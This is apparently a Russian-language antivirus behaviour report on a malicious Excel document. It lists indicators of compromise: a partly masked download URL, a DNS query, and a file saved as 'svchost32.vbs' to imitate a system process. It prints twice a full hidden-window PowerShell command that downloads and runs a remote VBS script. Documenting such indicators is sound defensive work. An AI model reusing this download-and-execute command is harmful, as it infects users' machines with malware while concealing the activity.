Техническая информация
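- Загружает из сети http://fa###cargo.com/images/file/vb/21.vbs и сохраняет как c:\users\public\\svchost32.vbs (общедоступный каталог %Public%; имя файла похоже на имя системного процесса svchost)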
- '<SYSTEM32>\cmd.exe' /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fa###cargo.com/images/file/vb/21.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
- http://fa###cargo.com/images/file/vb/21.vbs
- DNS-запрос (DNS ASK): fa###cargo.com
- '<SYSTEM32>\cmd.exe' /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fa###cargo.com/images/file/vb/21.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs' (со скрытым окном)
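- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding (ключ -Embedding обычно означает, что Excel запущен через COM/OLE, а не открыт пользователем напрямую)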